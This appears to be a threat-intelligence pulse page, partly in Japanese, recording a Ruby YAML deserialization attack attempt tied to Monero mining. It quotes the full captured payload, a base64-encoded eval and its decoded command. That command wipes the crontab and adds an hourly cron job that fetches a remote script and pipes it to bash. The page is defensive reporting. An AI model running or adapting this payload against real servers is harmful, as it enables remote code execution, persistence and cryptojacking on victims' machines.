Trusted Design

Monero new pool thru XML Ruby deserialized attack

概要

Monero again with a new pool. Try to use XML Ruby deserialized attack to execute root command on a server, here the attempt "<xAdwt type='yaml'>--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection 'LtUgJyxM; eval(%[c3lzdGVtKCdjcm9udGFiIC1yOyB3Z2V0IC1WJiZlY2hvICIxICogKiAqICogd2dldCAtcSAtTyAtIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLTt3Z2V0IC1WfHxjdXJsIC1WfGVjaG8gIjEgKiAqICogKiBjdXJsIC1zIGh0dHA6Ly9pbnRlcm5ldHJlc2VhcmNoLmlzL3JvYm90cy50eHQgMj4vZGV2L251bGx8YmFzaCA+L2Rldi9udWxsIDI+JjEifGNyb250YWIgLScpCg==].unpack(%[m0])[0]);' : !ruby/object:ActionController::Routing::Route segments: [] requirements: :MsLmhhug: :FR: :MKqyF </xAdwt> ------- system('crontab -r; wget -V&&echo "1 * * * * wget -q -O - http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1"|crontab -;wget -V||curl -V|echo "1 * * * * curl -s http://internetresearch.is/robots.txt 2>/dev/null|bash >/dev/null 2>&1"|crontab -')"

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

• Serialized Java Object Calling Common Collection Function Attack (score: 0.39)
• Watchguard XCS Remote Command Execution (score: 0.35)
• ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path Traversal (score: 0.34)
• Stale Cake from 204.232.209.188 (score: 0.34)
• attempted admin (score: 0.33)

このPulseに関連する脅威アクター (事実ベース)

このPulseに関連する脅威アクター (推論ベース)

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクター グラフ

---

← Pulse一覧に戻る